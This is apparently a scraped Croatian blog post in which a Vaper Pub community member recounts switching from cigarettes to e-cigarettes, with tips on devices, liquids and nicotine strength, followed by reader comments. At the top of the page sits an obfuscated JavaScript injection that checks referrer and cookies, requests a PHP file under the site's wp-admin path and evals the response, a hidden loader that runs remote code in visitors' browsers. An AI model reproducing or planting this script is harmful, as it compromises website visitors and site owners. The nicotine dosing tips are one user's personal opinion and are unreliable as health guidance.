;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
E cigareta i početnici

E cigareta i novi korisnici

E cigareta i novi korisnici je odličan tekst jedne članice Vaper Pub zajednice. Pročitajte njezino iskustvo u prvom susretu s e cigaretama.

by Valentina Žalac, 08.10.2021.

Eto, odlučila se i ja napisat koju rečenicu, pa možda pomognem kojem početniku, kao što sam i sama.

U svijet e cigareta sam ušla u 8.mj, prije nekih 2 mjeseca. Pošto sam imala, a i još uvijek imam zbrku u glavi, možda moje skromno iskustvo pomogne nekome od onih koji su na samome početku.

Kad sam odlučila probati pariti, u jednoj ženskoj grupi sam vidjela recenziju na Kiwi.

Čitala sam to i zagrizla, ali cijena mi je bila previsoka za nešto što mi se možda neće svidjeti. I tako, kopam ja jel’ ima šta jeftinije i naiđem na Innokin EG Filter. Cijena 160kn, reko može za probu, ako i ne bude valjalo, nisam puno potrošila. Al’ idem direktno u neku poslovnicu pa možda me i oni posavjetuju i predlože nešto drugo.

E, tu se nisam baš usrećila. Došla sam u poslovnicu, kad tamo student, nezainteresiran i za sebe i za sve oko sebe. Nemam ništa protiv studenata,i sama sam to jednom bila, ali zna se koje su njihove ambicije na takvim poslovima (odradit smjenu, malo nešto zaradit i to je to).

I tako kažem ja po šta sam došla, ali ako ima on nešto za predložit. Uglavnom, veli on da mi je to dobro i to je to. Otvori mi fascikl sa hrpom tekućina i pita koju ću. Stojim ja, gledam, k’o tele u šarena vrata i pojma nemam koju ću. On tipka na mobitelu. A ništa, uzmem ja čokoladu, pepermint i naranču.

Koja pogreška?!

E cigareta savijet br 1.

Uvijek na početku uzmite obavezno duhanske e tekućine. Ove slatke nisu dobar izbor na početku.

I tako prvih par dana vučem ja to, sve fino i slatko, al’ i dalje pušim cigarete. Em zbog toga što mi je uređaj preslab (to tada nisam znala), em me muči to stalno punjenje i sve mi to nešto curilo, em tekućine nisam dobro odabrala. Na mom mjestu, većina bi odustala, bacila to čudo u smeće i završila s parenjem. Ali, ne i ja….

Vidim ja da taj filter koji Innokin ima mi paše, al’ nešto mi fali, pa ipak se odlučim na to da probam i Kiwi. Prvenstveno zbog toga što ima filter, pa da mi i to olakša prelazak, a i lijepi je, kaj je, je. A i mislim si, ako dam tolike novce, bit će mi žao i dalje pušiti. Opet odem ja u poslovnicu, da čujem iz prve ruke. Ovaj put sam imala više sreće. Objasnili meni tamo sve, kako to funkcionira i to, uzmem i još jednu tekućinu za svaki slučaj. P.S. Ona naranča, čokolada i pepermint i dalje stoje.

E, onda sam napravila ključan potez- pronašla sam Vaper Pub grupu na fejsu. Čitam ja i čudom se čudim. Vidim ja nešto to oni motaju, pričaju o različitim grijačima, modovima, podovima i silnim čudima. Nakon par dana isčitavanja i proučavanja, skužim ja da je ekipa susretljiva i voljna pomoći i da se tu svašta nešto korisno može pronaći. Malo jesu munjeni i opićeni, al barataju hrpom korisnih informacija. Kroz par dana uzela ja i novi uređaj, Kroma Z, vidjela da ga u grupi hvale. I pronašla nekoliko tekućina koje mi baš odgovaraju. Sve u grupi ima, ko na placu.

E sad, par savjeta koje bih ja dala nekome tko tek ulaze u svijet e cigareta.

E cigareta početnici – odabir uređaja

Nemojte jurit grlom u jagode, proučite što se sve nudi na tržištu. Možda se na prvu to čini hrpa svega i od šume se ne vidi drvo, ali u nekoliko dana možete vidjeti što se nudi i što bi vama odgovaralo. Svatko sebi odabire ono što mu odgovara. Ženskom dijelu će vjerojatno zapeti za oko nekia manja e cigareta, dok će kod muškog dijela to biti neki veći uređaj. Jer veličina je bitna, jel?

U grupama na fejsu također ima jako puno postova u kojima se početnicima preporučaju uređaji. Dovoljno je u tražilicu grupe upisati i izbacit će te postove. Također, na nekim stranicama imaju u ponudi uređaja posebno naznačene uređaje za početnike i uređaje za napredne.

Nisam tako dugo u tome da bi bila neki stručnjak, mogu se osvrnuti samo na ono što sam probala. Ovo je moje osobno mišljenje i ne znači da je točno i da će se ostali složiti sa mnom.

Prva e cigareta koju sam probala bio je Innokin EQ FLTR. Cijenom i izgledom je ok, ima filtere kao cigareta što je pozitivno za one koji se tek pokušavaju odviknuti od njih. Meni je baterija bila preslaba, a i očito sam fulala izborom tekućina tako da sam i dalje pušila, ovo mi je bilo onako povremeno. Uređaj je ok za neku kavu ili slično,onako za imati ga za svaki slučaj, jer stane u svaki džep ili torbicu, ali okorjelog pušača teško da će zadovoljiti.

Zatim sam probala Kiwi. Da, da, znam i čitam na kojem glasu je Kiwi. Po meni, sasvim ok uređaj za početnike. Isto ima filter koji sliči cigareti, izgledom je privlačan, baterija je ok, veličina tanka također. (tank je dio uređaja u koji se ulijeva e-tekućina) Nas žene će privući izgledom, a znamo da je izgled važan u svakom pogledu. Ima sve ono što jedna žena treba. A i zbog toga što je došao na loš glas je još privlačniji. Hehehe

Baterija izdrži cijeli dan. Ima powerbank na koji se može puniti. Čist dovoljno za početak, a možda nekome i za stalno. Znam da ima i boljih i gorih uređaja u tom rangu,ali eto, nismo svi isti. Ako će ova mala simpatična spravica odvući nekoga od cigareta, samo naprijed! Ja ga i dalje koristim svakodnevno. Zgodan je jer ne zauzima puno mjesta u torbici, a i fensi šmensi je za na kavu.

Također koristim i Kroma Z uređaj. E, to je već malo jača pila, ali opet ne prejaka za početnika. Nije baš ono da držiš ciglu u ruci, a nije ni premali. Taman. Kod nje mi se jako sviđa što ima velik tank, a baterija je mrak, izdrži i nekoliko dana.

Kod odabira uređaja treba gledati veličinu tanka (2ml je ok, ali ako ste strastveni pušač neće izdržati cijeli dan). Veći tank znači i da više e-tekućine stane u njega. Zatim, jačina baterije. Što više mAh, to jača baterija. Evo, za usporedbu, Innokin ima 400mAh (meni nije izdržao ni pola dana), Kiwi ima 1650mAh (meni izdrži dan, ponekad i dva), a Kroma Z ima 3000 mAh (meni traje danima). Naravno, to sve ovisi o vašem načinu parenja i navikama od prije. A i ja ih koristim više, pa i o tome ovisi. EQ više ne koristim, Kiwi mi je kad nekud idem, a Kroma za po doma i za svaki slučaj je uvijek u torbi.

Kao što rekoh, izbor je velik, može zadovoljiti svačije potrebe. Dobro proučite i raspitajte se prije nego se zaletite i nemojte kupiti uređaj koji vam nije sjeo na prvu. Nije to zec, neće pobjeć’, samo smireno i polako. Ako i ne naiđete na prvu u poslovnicama na nekoga tko vam je voljan pomoći, pokušajte ponovno, nemojte odustati na prvu.

Odabir tekućina

Što se tekućina tiče, izbor je još veći nego sa uređajima, tako da ćete biti u još većem „problemu”.

Ono što je bitno na početku, treba uzeti neke duhanske tekućine i pravilnu dozu nikotina. Kolika doza nikotina vam treba, to vam mogu pomoći djelatnici u poslovnici ili možete i u grupama pronaći tu informaciju. Ja sam, recimo, pušila oko kutiju-kutiju i pol plavog Chestera. Preporučili su mi tekućine sa 6mg nikotina. Za prvu jutarnju kavu imam duhansku tekućinu sa 9 ili 12mg nikotina. Treba mi nešto jače dok se ne razbudim.

Preko dana se mogu koristiti tekućine sa okusima, ali da imaju i duhana u sebi. Kao što sam već rekla, ja uzela one neke voćke bez duhana i nisam se baš usrećila. Izbor je stvarno velik i možete izabrati nešto slično onome što ste koristili dok ste pušili. Npr. nekome tko je pušio cigarete s mentolom, odgovarat će mu sada duhan s mentolom i slično. Za početak si možete uzeti i one male tekućine od 10ml, čisto dok ne nađete što vam odgovara. Kasnije se možete prebaciti na one veće od 60ml koje su financijski isplativije. Ove od 10 ml su zgodne za probu,a i stanu u torbicu/džep, ako treba tank nadopuniti. Također, ima i stranica na kojoj se mogu testeri naručiti.

Ono što je trenutno koristim je Shake 4, SHAKE Vapelada, SHAKE Cocopuff, Freezer, Izabela, to mi je ono fino za preko dana. Ujutro uz kavu je Liqua Bright tobacco, Tobacotta ili RY4 double, to su duhanske i malo jače.

Postupak kako se mućkaju ova veća pakiranja možete pronaći na stranicama koje imaju u ponudi e-tekućine, ili vam mogu smućkati djelatnici u poslovnici ili pronađete u grupi, naravno.

Isto kao i sa uređajima, proučiti ponudu i smisleno odabrati. Izbor je ogroman i teško se odlučiti,ali za početak jednu-dvije tekućine, čisto dok ne dobijete osjećaj i ne vidite šta vam odgovara. Kasnije se kolekcija lagano povećava. :-)

Kriza

Nije baš jednostavno preko noći promijeniti navike koje smo imali godinama.

Sigurno ćete imati krize i poželjet ćete posegnuti za cigaretom. Pogreška koju sam ja radila je bila ta da sam kupovala cigarete „za svaki slučaj”, ono da imam ako me ulovi kriza. Naravno da me lovila kriza i da bi ta kutija nestala. Možda je trajala duže nego inače, ali nakon nekoliko dana je nije bilo. Onda sam odlučila prestati kupovati cigarete. Kad me uhvati kriza, posegnem za parilicom. Stavim si u nju neki jaaaakoooo fini okus i uživam.

Također, proučavam forume, grupe i stranice sa parilicama. Zatim, smišljam plan koju ću sljedeću tekućinu kupiti, ili proučavam koja mi se e cigareta sviđa. Jednostavno, prebacim se na parilice da mi skrenu misli.

Jedna od ideja je zacrtati si neki plan, npr. ako ovaj tjedan izdržim bez cigareta, kupiti ili napravit ću si to i to. Zacrtati neki cilj koji će vas motivirati.

Možete se javiti nekome od prijatelja/poznanika/susjeda koji koristi parilicu i s kojim ćete razmjenjivati iskustva. Ako ste poput mene, pa nemate nikog oko sebe tko pari, možete pronaći nekoga iz grupe s kim se možete tipkati. Najbolje nekoga tko je početnik kao i vi, pa se možete međusobno podržavati i dijeliti iskustva.

Također, na Youtube-u se može pronaći jako puno videa o svemu i svačemu, od e-tekućina, e cigareta, iskustava, svemu što vas zanima.

U grupi Vaper Pub je stvarno fenomenalna ekipa, koja je voljna pomoći svojim savjetima, a s kojom se također možete jako dobro nasmijati i zabaviti. Također, veliku dozu smijeha i zezancije možete pronaći i petkom u 21h na Vaper Pub Youtube kanalu ili linku u grupi. (P.S. pripremite si za jesti i piti jer oni znaju odužit sa zezancijom, hehe)
Kao što rekoh, ekipa u grupi je stvarno otkačena, pa ne znam jel’ od pare ili su prirodno takvi. Hehehe

Sve u svemu, za uspjeh u vejpanju je potrebno puno volje i strpljenja, ali sve se može kad se hoće. Na internetu možete pronaći informaciju o bilo čemu što vas zanima, ali motivaciju morate pronaći u sebi.

Lijepi pozdrav svima!

Choose your Reaction!
 • Ajd da prokomentiram još jednu stvar ovdje. Vidim da masovno ekipa, a tu prije svega mislim na ženski dio populacije koja želi prestati koristiti cigarete putem vejpa, ima tu neku fixaciju na cigaretne filtere. Tako je cvilila i moja draga, fali joj taj osjećaj. I čitao sam često iskustva naših dragih vejperica, skoro pa sve trebaju taj osjećaj kao da koriste cigaretu dok vejpaju, o čemu se tu točno radi? Ja znam da sam od vejpa očekivao samo da se što prije maknem sa duhančine, da si sačuvam to malo zdravlja što je ostalo nakon umalo pa punih 35 godina trovanja samog sebe cigaretama. Uopće mi nije falio taj osjećaj pušenja cigarete, nikotin sam i tako dobio putem pare. Znam da nije slučaj kod svih vejperica da traže te nekakve uređaje s imitacijom cigaretnih filtera, ali da ih ima, ima ih. Vidimo da kod nas dobro kotiraju i taj famozni Kiwi i Innokin EQ FLTR. NHF, nisam ovime nikoga mislio uvrijediti ili što slično, samo sam znatiželjan.

  • vjerojatno je više shema kaj ti uređaji s filterima izgledaju više fancy nego ovi s plastičnim driptipovima :) ne vidim drugi razlog. Naravno, sigurno ima i dosta ljudi, ne samo žena – kojima fali taj spužvasti feeling filtera cigarete u ustima.

 • Super napisan članak. Moj poredak je bio WIIP – IO POD – ENDURA T18ii mini – KROMA Z kroz nekih 6 mj i evo skoro tjedan tjedan bez cigareta tako da će lagano adapter 510 i prvi tankovi uskoro..

 • Ja sam počela bezveze vejpati, čista znatiželja, dva tj parila doma a na poslu cigarete, čist da izbjegnem nepotrebna objašnjavanja kolegama… Otišla na more bez trunke duhana, inače motala, s jadnom jem pen i par kupovnih tekućina, na moru nabavila kromu z i dedu, doslovno preko noći presla na vejp. 31.7.zapalila jednu cigaretu i odma ugasila i do danas nisam dobila želju usmrditi se… Vratila se s mora na posao bez cigareta i spremna na čudne poglede i nepotrebna pitanja a i glupe komentare.

 • Odlično napisano, hvala 🙂 Ovo je otprilike bio i moj put, samo šta sam ja nekoliko mjeseci prije vejpanja bila na Iqos-u i Glo-u,a onda sam na Ženski recenziraj
  pročitala o Izy vape uređaju, parila nekih mjesec dana dok nisam našla na fejsu ovu grupu , pročitala gomilu toga i ispregledala masu videa i i shvatila da je vejpanje skroz neka druga priča
  Hvala svima u grupi na pomoći i podijeljenim informacijama 🙂

 • Ja za sebe mogu ustvrditi da sam i inače blesav, nije mi to stiglo sa Vejpanjem. Inače, lijepo napisan text, svaka čast. Osobno sam neplanski prešao na Vaping, jednostavno mi je duhan postao prenaporan, udaralo mi na zdravlje i to više nisam želio. Ono, ubijaš sam sebe iz dana u dan. I samo jedared u ovih 6 mjeseci koliko sam “Vejper” sam doživio krizu. 01.06. kad mi je Wiip otkazao suradnju, tad sam od jutra do 7 navečer zapalio 2 cigarete, smotane od tog istog prokletog “duhana”.

  • U 7 navečer, tog 01.06. mi je moj frend Jimmy isporučio Geekvape Frenzy Pod i prvu bočicu tekućine, 120ml sa 6 mg nikotina. Doslovno me je spasio s time. Sljedeća 3 mjeseca sam proveo pareći na tom malom podiću i ta bočica mi je trajala cijelo to vrijeme. U međuvremenu sam sam sebe testirao i zapalio još 6 cigareta. Nikakav gušt ni privlačnost nisam osjetio a radilo se je o Marlboru, Lucky Strike i Davidoffu. Sve pljuge koje sam inače preferirao. I onda je konačno stigao i moj Coolfire Z80…

   • Coolfire Z80 sa Zenith II tankom. Eh, koje je to bilo veselje:) A, sad imam i Sigelei 213W TC mod + Galaxies MTL RTA i Merlin RTA tankove. Me happy:) Nema teoretske šanse da ću se na cigarete vratiti, jednostavno mi više ne odgovaraju i dokle god ima kvalitetne pare ja sam miran:) Još mi je fora što sam uspio par prijatelja već zainteresirati za Vaping jer se i sami žele maknuti od duhana. Sorry kaj sam ovo pisao u 3 komentara, ne stane sve u jedan ;) LP svoj ekipi i Valentini, nema predaje :)

Leave a Comment